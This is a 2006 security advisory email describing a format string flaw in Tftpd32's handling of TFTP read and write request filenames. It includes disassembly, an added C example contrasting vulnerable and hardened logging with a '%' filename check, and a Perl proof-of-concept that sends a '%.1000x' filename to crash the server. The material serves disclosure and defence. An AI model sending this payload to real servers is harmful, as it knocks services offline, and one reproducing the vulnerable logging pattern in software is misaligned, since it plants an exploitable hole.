From: SecuriTeam <support@securiteam.com>
To: [email protected]
Date: 7 Feb 2006 18:21:29 +0200
Subject: [NT] Tftpd SEND and GET Format String Vulnerability
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060208111418.0AB3F5807@mail.tyumen.ru>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Tftpd SEND and GET Format String Vulnerability
------------------------------------------------------------------------
SUMMARY
" <http://tftpd32.jounin.net/> Tftpd32 includes DHCP, TFTP, SNTP and
Syslog servers as well as a TFTP client."
A format string vulnerability in Tftpd32 causes a denial of service when a
malformed SEND (write) or GET (read) request is received.
DETAILS
Vulnerable Systems:
* Tftpd32 version 2.81
Due to incorrect use of format strings there is a possibility of remote
code execution. The vulnerability is triggered by sending a SEND or GET
request whose filename field contains a specially formatted string: the
field reaches wvsprintfA as its Format argument (see the listing below),
so printf-style directives in it are interpreted rather than copied.
Vulnerable code:
LEA ECX,DWORD PTR SS:[ESP+430]
LEA EAX,DWORD PTR SS:[ESP+1C]
PUSH ECX ; /Arglist
PUSH EDX ; |Format
PUSH EAX ; |s = 00E6F4E8
CALL DWORD PTR DS:[<&USER32.wvsprintfA>] ; \wvsprintfA
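The call shape in the listing above, as an added example that is neither Tftpd32 source nor part of the advisory: a minimal C parser for the RFC 1350 read/write request layout, the vulnerable logger in which the filename field becomes the printf-family format argument (portable vsnprintf stands in for wvsprintfA; the control flow is the same), the hardened logger that keeps the format string a literal, and a check that flags '%' in a filename. The struct, field sizes and function names are assumptions for illustration only.

```c
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added illustration, not Tftpd32 source. The bug is the data flow:
 * the filename taken from the RRQ/WRQ datagram is handed to the printf
 * family as its Format argument, so directives in it are interpreted. */

#define TFTP_RRQ 1             /* read request  ("GET" in the advisory)  */
#define TFTP_WRQ 2             /* write request ("SEND" in the advisory) */
#define TFTP_MAX_FIELD 256     /* assumed cap for this example */

struct tftp_req {
    uint16_t opcode;
    char filename[TFTP_MAX_FIELD];
    char mode[TFTP_MAX_FIELD];
};

/* Copy one NUL-terminated field starting at pkt[*off]. Returns 0 and
 * advances *off past the terminator, or -1 if the datagram ends before a
 * NUL or the field does not fit in dst. */
static int take_field(const uint8_t *pkt, size_t len, size_t *off,
                      char *dst, size_t dstlen)
{
    size_t start = *off, i;
    for (i = start; i < len; i++) {
        if (pkt[i] == 0) {
            size_t n = i - start;
            if (n >= dstlen)
                return -1;
            memcpy(dst, pkt + start, n);
            dst[n] = 0;
            *off = i + 1;
            return 0;
        }
    }
    return -1;
}

/* Parse the RFC 1350 request layout: opcode(2) | filename | 0 | mode | 0. */
int parse_tftp_request(const uint8_t *pkt, size_t len, struct tftp_req *out)
{
    size_t off = 2;
    if (len < 4)
        return -1;
    out->opcode = (uint16_t)((pkt[0] << 8) | pkt[1]);
    if (out->opcode != TFTP_RRQ && out->opcode != TFTP_WRQ)
        return -1;
    if (take_field(pkt, len, &off, out->filename, sizeof out->filename))
        return -1;
    if (take_field(pkt, len, &off, out->mode, sizeof out->mode))
        return -1;
    return 0;
}

/* Detection check: a TFTP filename has no legitimate reason to carry '%'. */
int filename_has_format_directive(const char *name)
{
    return strchr(name, '%') != NULL;
}

/* The vulnerable shape (the wvsprintfA call in the advisory's listing):
 * log_vulnerable(buf, sizeof buf, req.filename) with filename "%.1000x"
 * reads a vararg that was never pushed and expands to 1000 characters.
 * Deliberately not exercised below: its behaviour is undefined. */
void log_vulnerable(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
}

/* The fix: the format string is a literal and the filename is only data. */
int log_hardened(char *out, size_t outlen, const struct tftp_req *req)
{
    const char *op = (req->opcode == TFTP_RRQ) ? "RRQ" : "WRQ";
    return snprintf(out, outlen, "%s %s (%s)", op, req->filename, req->mode);
}

int main(void)
{
    /* The advisory's PoC datagram, constructed here byte for byte. */
    const uint8_t poc[] = "\x00\x01" "%.1000x\x00" "octet\x00";
    struct tftp_req req;
    char line[128];

    if (parse_tftp_request(poc, sizeof poc - 1, &req) != 0) {
        puts("malformed request");
        return 1;
    }
    if (filename_has_format_directive(req.filename))
        puts("filename contains '%': the vulnerable logger would interpret it");
    log_hardened(line, sizeof line, &req);
    puts(line);                       /* RRQ %.1000x (octet) */
    return 0;
}
```

Compiled and run, the program parses the PoC datagram, flags the '%' in the filename and prints the hardened log line. The vulnerable logger is kept only to show the shape that must not exist: on Windows, wvsprintfA is documented to cap its output at 1024 characters and to accept only a subset of printf directives, which limits what a crafted filename can do, but the only correct fix is the hardened form, where the request data never becomes the format argument.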
Exploit:
#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research
# http://www.critical.lt
use strict;
use warnings;
use IO::Socket;

my $port = "69";
my $host = "127.0.0.1";
my $tftpudp = IO::Socket::INET->new(PeerPort => $port,
                                    PeerAddr => $host,
                                    Proto    => 'udp')
    or die "cannot create UDP socket: $@";

# TFTP read request (RRQ, opcode 1): opcode | filename | 0 | mode | 0
# The filename field is what Tftpd32 hands to wvsprintfA as the format string.
my $bzz = "\x00\x01";                     # opcode 1 = RRQ ("GET")
$bzz   .= "%.1000x\x00";                  # filename: format directive, NUL terminated
$bzz   .= "\x6F\x63\x74\x65\x74\x00";     # mode "octet", NUL terminated
$tftpudp->send($bzz);
ADDITIONAL INFORMATION
The original article can be found at:
http://www.critical.lt/?vulnerabilities/200
Related articles:
* <http://www.securiteam.com/windowsntfocus/6D00D2061G.html> TFTPD32
Directory Traversal Vulnerability
* <http://www.securiteam.com/windowsntfocus/6C00C2061A.html> TFTPD32
Buffer Overflow Vulnerability (Long filename)
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.